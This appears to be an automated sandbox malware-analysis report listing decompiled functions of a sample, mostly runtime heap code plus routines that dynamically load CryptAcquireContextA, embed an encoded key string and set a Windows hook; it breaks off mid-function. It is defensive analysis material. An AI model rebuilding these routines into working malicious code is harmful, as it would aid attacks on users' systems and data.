                                                                              • Opcode ID: cf59c28b544082afeb2c52bfffa1c3c201993419a19452b0c09b9db3eddc0a44
                                                                              • Instruction ID: 8d60ae65d3de2ec173cb7bffc614e31779142a128116d219209176ffc86a8800
                                                                              • Opcode Fuzzy Hash: cf59c28b544082afeb2c52bfffa1c3c201993419a19452b0c09b9db3eddc0a44
                                                                              • Instruction Fuzzy Hash: A72141B1E00224FFEF14CF96DD85AAEBBB8EF50305F50406BE505A6211D774AA44CF25
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00405F9A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1199 405f9a-405fb7 call 4128a0 call 40180a 1204 405fb9-406005 call 411a30 call 401784 call 403c31 1199->1204 1205 40600b-406038 call 408aaa call 407d75 call 424be6 1199->1205 1216 40600a 1204->1216 1218 406043-406061 call 401bce 1205->1218 1219 40603a-40603d SetFileSecurityW 1205->1219 1216->1205 1219->1218
                                                                              C-Code - Quality: 94%
                                                                              			E00405F9A(void* __ecx, void* __esi, void* __eflags) {
				void* _t16;
				signed char _t27;
				signed int _t28;
				void* _t31;
				void* _t43;
				void* _t51;

				E004128A0(E00430A04, _t51);
				_t31 = __ecx; // executed
				_t16 = E0040180A(__ecx); // executed
				if(_t16 == 0) {
					 *((intOrPtr*)(_t51 - 0x10)) = 0;
					 *((intOrPtr*)(_t51 - 0x14)) = 0;
					_t27 = E00401784(_t51 - 0x10, _t51 - 0x14, "emFkQUdjdmZiR1RkZnNYQ3ods", E00411A30("emFkQUdjdmZiR1RkZnNYQ3ods")); // executed
					_t28 = _t27 & 0x000000ff;
					 *0x4560d0 = 0x6802 - _t28;
					 *0x4560d4 = 0x1001 - _t28;
					_t43 = 0x41;
					 *0x4560d8 = 0x1001; // executed
					E00403C31(_t43 - _t28, 0x1001); // executed
				}
				E00408AAA(0);
				_push(0);
				E00407D75(_t51 - 0x140);
				 *(_t51 - 4) = 0;
				 *((intOrPtr*)(_t31 + 0x1c)) = _t51 - 0x140;
				if(E00424BE6(_t51 - 0x140) == 1) {
					SetFileSecurityW(0, 0, 0);
				}
				 *(_t51 - 4) =  *(_t51 - 4) | 0xffffffff;
				E00401BCE(_t51 - 0x140);
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return 0;
			}









                                                                              0x00405f9f
                                                                              0x00405fac
                                                                              0x00405fae
                                                                              0x00405fb7
                                                                              0x00405fc0
                                                                              0x00405fc3
                                                                              0x00405fd5
                                                                              0x00405fda
                                                                              0x00405fe4
                                                                              0x00405ff4
                                                                              0x00405ffc
                                                                              0x00405fff
                                                                              0x00406005
                                                                              0x0040600a
                                                                              0x0040600c
                                                                              0x00406012
                                                                              0x00406019
                                                                              0x0040602a
                                                                              0x0040602d
                                                                              0x00406038
                                                                              0x0040603d
                                                                              0x0040603d
                                                                              0x00406043
                                                                              0x0040604d
                                                                              0x00406059
                                                                              0x00406061

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00405F9F
                                                                                • Part of subcall function 0040180A: GetModuleHandleW.KERNEL32(ADVAPI32.DLL,CryptAcquireContextA), ref: 0040181A
                                                                                • Part of subcall function 0040180A: GetProcAddress.KERNEL32(00000000), ref: 00401821
                                                                              • _strlen.LIBCMT ref: 00405FC6
                                                                                • Part of subcall function 00403C31: __EH_prolog.LIBCMT ref: 00403C36
                                                                              • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040603D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$AddressFileHandleModuleProcSecurity_strlen
                                                                              • String ID: emFkQUdjdmZiR1RkZnNYQ3ods
                                                                              • API String ID: 353750186-3100813025
                                                                              • Opcode ID: 6f275b23a37ebe25d968691e7df69b9ca7760517390b081f732cbfa169a9fc78
                                                                              • Instruction ID: d0d7e402275523c15f562869e77d0675759ef40cad440e539a3049c9069d2aae
                                                                              • Opcode Fuzzy Hash: 6f275b23a37ebe25d968691e7df69b9ca7760517390b081f732cbfa169a9fc78
                                                                              • Instruction Fuzzy Hash: 7211B4B19002149ADB29EF66D945AEE7BB8EF84304F00017FE506E31D1DB7C9B41CA14
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040180A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1238 40180a-40183b GetModuleHandleW GetProcAddress 1240 401841-40184f 1238->1240 1241 40183d-40183f 1238->1241 1242 401852-401855 1240->1242 1241->1242
                                                                              C-Code - Quality: 37%
                                                                              			E0040180A(void* __ecx) {
				char _v8;
				_Unknown_base(*)()* _t7;
				void* _t9;
				signed int _t12;
				void* _t14;
				_Unknown_base(*)()* _t15;
				void* _t17;

				_t7 = GetProcAddress(GetModuleHandleW(L"ADVAPI32.DLL"), "CryptAcquireContextA");
				_t15 = _t7;
				_v8 = 0;
				_t9 =  *_t15( &_v8, 0, 0, 1, 0, _t14, _t17, __ecx); // executed
				if(_t9 != 0) {
					_t12 =  *_t15( &_v8, 0, 0, 1, 8) & 0xffffff00 | _t11 != 0x00000000;
				} else {
					_t12 = 0;
				}
				return _t12;
			}










                                                                              0x00401821
                                                                              0x0040182d
                                                                              0x00401834
                                                                              0x00401837
                                                                              0x0040183b
                                                                              0x0040184f
                                                                              0x0040183d
                                                                              0x0040183d
                                                                              0x0040183d
                                                                              0x00401855

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(ADVAPI32.DLL,CryptAcquireContextA), ref: 0040181A
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00401821
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: ADVAPI32.DLL$CryptAcquireContextA
                                                                              • API String ID: 1646373207-987850268
                                                                              • Opcode ID: eecb9840068e36674a91a3f914a2579a2c994b1c6506360aa7c0764d2af295fc
                                                                              • Instruction ID: 9a4be1db1f9f4d6467f41e04a66d3d51ccf638422c920b1e6b222a5a67e9a983
                                                                              • Opcode Fuzzy Hash: eecb9840068e36674a91a3f914a2579a2c994b1c6506360aa7c0764d2af295fc
                                                                              • Instruction Fuzzy Hash: C9F0ECB3541324B6DA1067A55D0EFCB3B9CDF86B50F104031F501E2080D5F49B01D6B4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004146EA, Relevance: 3.1, APIs: 2, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3155 4146ea-414702 call 412ba4 3158 414705-41470d 3155->3158 3159 414704 3155->3159 3160 414774-414776 3158->3160 3161 41470f-414716 3158->3161 3159->3158 3164 414778-41477e 3160->3164 3165 41479d 3160->3165 3162 414718-41472a 3161->3162 3163 41475f-414761 3161->3163 3162->3163 3167 41472c-41474f call 4148f8 call 4151bb call 414794 3162->3167 3163->3165 3169 414763-414772 RtlAllocateHeap 3163->3169 3164->3165 3166 414780-414789 call 4154b7 3164->3166 3168 41479f-4147a4 call 412bdf 3165->3168 3166->3158 3176 41478f 3166->3176 3167->3169 3181 414751-41475c call 412140 3167->3181 3169->3160 3176->3168 3181->3163
                                                                              C-Code - Quality: 76%
                                                                              			E004146EA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				long _t23;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t40;

				_push(0x10);
				_push(0x44bd00);
				E00412BA4(__ebx, __edi, __esi);
				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
				 *(_t33 - 0x20) = _t31;
				if(_t31 == 0) {
					_t31 = _t31 + 1;
				}
				do {
					_t28 = 0;
					 *(_t33 - 0x1c) = 0;
					if(_t31 > 0xffffffe0) {
						L9:
						if(_t28 != 0 ||  *0x45a59c == _t28) {
							L13:
							_t15 = _t28;
							L14:
							return E00412BDF(_t15);
						} else {
							goto L11;
						}
					}
					if( *0x45bc48 != 3) {
						L7:
						if(_t28 != 0) {
							goto L13;
						}
						L8:
						_t17 = RtlAllocateHeap( *0x45bc44, 8, _t31); // executed
						_t28 = _t17;
						goto L9;
					}
					_t31 = _t31 + 0x0000000f & 0xfffffff0;
					 *(_t33 + 0xc) = _t31;
					_t23 =  *(_t33 - 0x20);
					_t40 = _t23 -  *0x45bc34; // 0x0
					if(_t40 > 0) {
						goto L7;
					}
					E004148F8(_t23, 0, 4);
					 *(_t33 - 4) =  *(_t33 - 4) & 0;
					_push(_t23);
					 *(_t33 - 0x1c) = E004151BB();
					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
					E00414794();
					_t28 =  *(_t33 - 0x1c);
					if(_t28 == 0) {
						goto L8;
					}
					E00412140(_t28, 0,  *(_t33 - 0x20));
					_t34 = _t34 + 0xc;
					goto L7;
					L11:
				} while (E004154B7(_t31) != 0);
				goto L14;
			}









                                                                              0x004146ea
                                                                              0x004146ec
                                                                              0x004146f1
                                                                              0x004146f9
                                                                              0x004146fd
                                                                              0x00414702
                                                                              0x00414704
                                                                              0x00414704
                                                                              0x00414705
                                                                              0x00414705
                                                                              0x00414707
                                                                              0x0041470d
                                                                              0x00414774
                                                                              0x00414776
                                                                              0x0041479d
                                                                              0x0041479d
                                                                              0x0041479f
                                                                              0x004147a4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414776
                                                                              0x00414716
                                                                              0x0041475f
                                                                              0x00414761
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414763
                                                                              0x0041476c
                                                                              0x00414772
                                                                              0x00000000
                                                                              0x00414772
                                                                              0x0041471b
                                                                              0x0041471e
                                                                              0x00414721
                                                                              0x00414724
                                                                              0x0041472a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041472e
                                                                              0x00414734
                                                                              0x00414737
                                                                              0x0041473e
                                                                              0x00414741
                                                                              0x00414745
                                                                              0x0041474a
                                                                              0x0041474f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414757
                                                                              0x0041475c
                                                                              0x00000000
                                                                              0x00414780
                                                                              0x00414787
                                                                              0x00000000

                                                                              APIs
                                                                              • __lock.LIBCMT ref: 0041472E
                                                                              • RtlAllocateHeap.NTDLL(00000008,?,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 0041476C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap__lock
                                                                              • String ID:
                                                                              • API String ID: 4078605025-0
                                                                              • Opcode ID: 9e3f344b9606a3d4450a4edb9d16289ef02f26369923d962b6e20b81e9ae5539
                                                                              • Instruction ID: 9a9508c772f301707be30ab66f077d5bbe1b64f7d936fa0f595aadbb1db11760
                                                                              • Opcode Fuzzy Hash: 9e3f344b9606a3d4450a4edb9d16289ef02f26369923d962b6e20b81e9ae5539
                                                                              • Instruction Fuzzy Hash: 2D119336C0171896CB21AB659D417DE7730EBD2735F25411BE8346B3D1DB3C49818A9D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00412A4D, Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3184 412a4d-412a5e call 412ba4 3187 412a60-412a67 3184->3187 3188 412ab8-412abd call 412bdf 3184->3188 3190 412aa9 3187->3190 3191 412a69-412a81 call 4148f8 call 4149dc 3187->3191 3192 412aaa-412ab2 RtlFreeHeap 3190->3192 3198 412a83-412a8b call 414a07 3191->3198 3199 412a8c-412a99 call 412aa0 3191->3199 3192->3188 3198->3199 3199->3188 3204 412a9b-412a9e 3199->3204 3204->3192
                                                                              C-Code - Quality: 18%
                                                                              			E00412A4D() {
				char _t9;
				intOrPtr _t12;
				void* _t14;
				void* _t19;
				void* _t20;
				intOrPtr _t21;
				void* _t22;

				_push(0xc);
				_push(0x44bc58);
				_t9 = E00412BA4(_t14, _t19, _t20);
				_t21 =  *((intOrPtr*)(_t22 + 8));
				if(_t21 != 0) {
					if( *0x45bc48 != 3) {
						_push(_t21);
						goto L7;
					} else {
						E004148F8(_t14, _t19, 4);
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						_t12 = E004149DC(_t21);
						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
						if(_t12 != 0) {
							_push(_t21);
							_push(_t12);
							E00414A07();
						}
						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
						_t9 = E00412AA0();
						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t22 + 8)));
							L7:
							_push(0);
							_t9 = RtlFreeHeap( *0x45bc44); // executed
						}
					}
				}
				return E00412BDF(_t9);
			}










                                                                              0x00412a4d
                                                                              0x00412a4f
                                                                              0x00412a54
                                                                              0x00412a59
                                                                              0x00412a5e
                                                                              0x00412a67
                                                                              0x00412aa9
                                                                              0x00000000
                                                                              0x00412a69
                                                                              0x00412a6b
                                                                              0x00412a71
                                                                              0x00412a76
                                                                              0x00412a7c
                                                                              0x00412a81
                                                                              0x00412a83
                                                                              0x00412a84
                                                                              0x00412a85
                                                                              0x00412a8b
                                                                              0x00412a8c
                                                                              0x00412a90
                                                                              0x00412a99
                                                                              0x00412a9b
                                                                              0x00412aaa
                                                                              0x00412aaa
                                                                              0x00412ab2
                                                                              0x00412ab2
                                                                              0x00412a99
                                                                              0x00412a67
                                                                              0x00412abd

                                                                              APIs
                                                                              • __lock.LIBCMT ref: 00412A6B
                                                                                • Part of subcall function 004148F8: EnterCriticalSection.KERNEL32(?,?,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00414920
                                                                              • RtlFreeHeap.NTDLL(00000000,?,0044BC58,0000000C,004148DC,00000000,0044BD10,00000008,00414911,?,?,?,00414733,00000004,0044BD00,00000010), ref: 00412AB2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterFreeHeapSection__lock
                                                                              • String ID:
                                                                              • API String ID: 3012239193-0
                                                                              • Opcode ID: 7de0a700edc51f0575296d7f5c35098e526ef385e058385119acf4dae721a10e
                                                                              • Instruction ID: 935e11fe4407fd2a72af7364bf15c9ba698cc687047e6f296167308fe2797e93
                                                                              • Opcode Fuzzy Hash: 7de0a700edc51f0575296d7f5c35098e526ef385e058385119acf4dae721a10e
                                                                              • Instruction Fuzzy Hash: 1BF06D31945256AEDF34AB659E06BDF3B609F003AAF20011FF014A61D1CFBC99E08A9C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004121A0, Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3205 4121a0-4121b6 call 412ba4 3208 4121e6-4121e8 3205->3208 3209 4121b8-4121be 3205->3209 3211 4121eb-4121f2 3208->3211 3212 4121ea 3208->3212 3209->3208 3210 4121c0-4121e4 call 4148f8 call 4151bb call 412212 3209->3210 3210->3208 3216 412209-41220e call 412bdf 3210->3216 3214 4121f4-4121f7 3211->3214 3215 4121fa-412203 RtlAllocateHeap 3211->3215 3212->3211 3214->3215 3215->3216
                                                                              C-Code - Quality: 63%
                                                                              			E004121A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x44bbf0);
				E00412BA4(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x45bc48 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x45bc48 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x45bc44, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x45bc34; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E004148F8(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E004151BB();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E00412212();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E00412BDF(_t9);
			}






                                                                              0x004121a0
                                                                              0x004121a2
                                                                              0x004121a7
                                                                              0x004121ac
                                                                              0x004121b6
                                                                              0x004121e6
                                                                              0x004121e8
                                                                              0x004121ea
                                                                              0x004121ea
                                                                              0x004121f2
                                                                              0x004121f7
                                                                              0x004121f7
                                                                              0x00412203
                                                                              0x004121b8
                                                                              0x004121b8
                                                                              0x004121be
                                                                              0x00000000
                                                                              0x004121c0
                                                                              0x004121c2
                                                                              0x004121c8
                                                                              0x004121cc
                                                                              0x004121d3
                                                                              0x004121d6
                                                                              0x004121da
                                                                              0x004121df
                                                                              0x004121e4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004121e4
                                                                              0x004121be
                                                                              0x0041220e

                                                                              APIs
                                                                              • __lock.LIBCMT ref: 004121C2
                                                                                • Part of subcall function 004148F8: EnterCriticalSection.KERNEL32(?,?,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00414920
                                                                              • RtlAllocateHeap.NTDLL(00000000,?,0044BBF0,0000000C,0041222B,000000E0,00412256,?,0041487B,00000018,0044BD10,00000008,00414911,?,?), ref: 00412203
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCriticalEnterHeapSection__lock
                                                                              • String ID:
                                                                              • API String ID: 409319249-0
                                                                              • Opcode ID: a55cb6f1d43d24d148deef977f9e6cdd6e96af135a18d45a2e99e45d15723aea
                                                                              • Instruction ID: 48c3ffb159e8fc771b64ac231a54c8a91645d08bb152c579a7affd53d3d8778f
                                                                              • Opcode Fuzzy Hash: a55cb6f1d43d24d148deef977f9e6cdd6e96af135a18d45a2e99e45d15723aea
                                                                              • Instruction Fuzzy Hash: 4CF0C831D41214A7DB36EF759E057DE7720FB00725F50012AE924A62E1CFBC5ED0869C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00414943, Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3224 414943-414961 HeapCreate 3225 414963-414970 call 414929 3224->3225 3226 41498d-41498f 3224->3226 3229 414990-414993 3225->3229 3230 414972-41497f call 414994 3225->3230 3230->3229 3233 414981-414987 HeapDestroy 3230->3233 3233->3226
                                                                              C-Code - Quality: 100%
                                                                              			E00414943(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x45bc44 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E00414929();
					 *0x45bc48 = _t8;
					if(_t8 != 3 || E00414994(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x45bc44);
						goto L4;
					}
				}
			}





                                                                              0x00414954
                                                                              0x0041495c
                                                                              0x00414961
                                                                              0x0041498d
                                                                              0x0041498f
                                                                              0x00414963
                                                                              0x00414963
                                                                              0x0041496b
                                                                              0x00414970
                                                                              0x00414993
                                                                              0x00414981
                                                                              0x00414987
                                                                              0x00000000
                                                                              0x00414987
                                                                              0x00414970

                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00412E2C,00000001,?,0044BC68,00000060), ref: 00414954
                                                                                • Part of subcall function 00414994: HeapAlloc.KERNEL32(00000000,00000140,0041497C,000003F8,?,0044BC68,00000060), ref: 004149A1
                                                                              • HeapDestroy.KERNEL32(?,0044BC68,00000060), ref: 00414987
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocCreateDestroy
                                                                              • String ID:
                                                                              • API String ID: 2236781399-0
                                                                              • Opcode ID: aff9073249fdba3df2b0b2e6245fbdc016461b9e352443f97512692afa76d33e
                                                                              • Instruction ID: ef8a14752b0d236ab7371013dea1d91e840b001d055d94ac65187d4ae68ae6b5
                                                                              • Opcode Fuzzy Hash: aff9073249fdba3df2b0b2e6245fbdc016461b9e352443f97512692afa76d33e
                                                                              • Instruction Fuzzy Hash: 3DE04FF0A653019AEB29ABB0AE0576736E8DB84747F10183EF504C51A5FF78C5C0D60C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00423E66, Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3234 423e66-423e6f call 42d179 3237 423e93 3234->3237 3238 423e71-423e92 call 42d169 GetCurrentThreadId SetWindowsHookExA 3234->3238 3238->3237
                                                                              C-Code - Quality: 100%
                                                                              			E00423E66() {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;

				_t3 = E0042D179();
				if( *((char*)(_t3 + 0x14)) == 0) {
					_t4 = E0042D169();
					_t6 = SetWindowsHookExA(0xffffffff, E00423CE8, 0, GetCurrentThreadId()); // executed
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}






                                                                              0x00423e66
                                                                              0x00423e6f
                                                                              0x00423e72
                                                                              0x00423e89
                                                                              0x00423e8f
                                                                              0x00000000
                                                                              0x00423e92
                                                                              0x00423e93

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentHookThreadWindows
                                                                              • String ID:
                                                                              • API String ID: 1904029216-0
                                                                              • Opcode ID: cae5ce49b91b67683fe70485a877443856f942641f6482959c04ee0e154a77bf
                                                                              • Instruction ID: f6c6e9868a24ddcf20022a80b6482d79bb8311178825cfd61d607d367921f13a
                                                                              • Opcode Fuzzy Hash: cae5ce49b91b67683fe70485a877443856f942641f6482959c04ee0e154a77bf
                                                                              • Instruction Fuzzy Hash: 27D0A771A043307FE7102B757D0DB1B3B609B04735F51139BF011525E5C66C8940475D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042147B, Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E0042147B(void* __ebx, signed int __ecx, void* __edi, void* __esi) {
				intOrPtr _t46;
				signed int _t48;
				intOrPtr _t53;
				signed int _t58;
				void* _t60;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				intOrPtr* _t68;
				signed int* _t69;
				signed int _t71;
				signed int _t78;
				intOrPtr _t93;
				signed int _t101;
				signed int _t103;
				signed int* _t104;
				void* _t105;
				void* _t107;
				void* _t108;

				E004128A0(E0043162E, _t105);
				_t108 = _t107 - 0x2c;
				_t46 =  *0x457184; // 0xb7aa1229
				_push(__ebx);
				_t71 =  *(_t105 + 8);
				_push(__esi);
				 *((intOrPtr*)(_t105 - 0x10)) = _t46;
				_t101 = __ecx;
				if(_t71 != 0xffffffff) {
					_t78 =  *( *(__ecx + 0x24));
					_push(__edi);
					__eflags = _t78;
					if(_t78 == 0) {
						L5:
						_t48 =  *(_t101 + 0x58);
						__eflags = _t48;
						if(_t48 == 0) {
							L30:
							_t49 = _t48 | 0xffffffff;
							__eflags = _t48 | 0xffffffff;
							L31:
							L32:
							 *[fs:0x0] =  *((intOrPtr*)(_t105 - 0xc));
							return E00412FBB(_t49,  *((intOrPtr*)(_t105 - 0x10)));
						}
						__eflags =  *(_t101 + 0x3c);
						if(__eflags != 0) {
							 *(_t105 - 0x2d) = _t71;
							E00401A7A(_t71,  *((intOrPtr*)(_t101 + 0x48)), 0, 0xffffffff);
							_push(0);
							E00421363(_t105 - 0x2c, _t105, 8);
							 *((intOrPtr*)(_t105 - 4)) = 0;
							while(1) {
								__eflags =  *((intOrPtr*)(_t105 - 0x14)) - 0x10;
								_t53 =  *((intOrPtr*)(_t105 - 0x28));
								if( *((intOrPtr*)(_t105 - 0x14)) >= 0x10) {
									_t93 =  *((intOrPtr*)(_t105 - 0x28));
								} else {
									_t53 = _t105 - 0x28;
									_t93 = _t53;
								}
								_t98 =  *( *(_t101 + 0x3c));
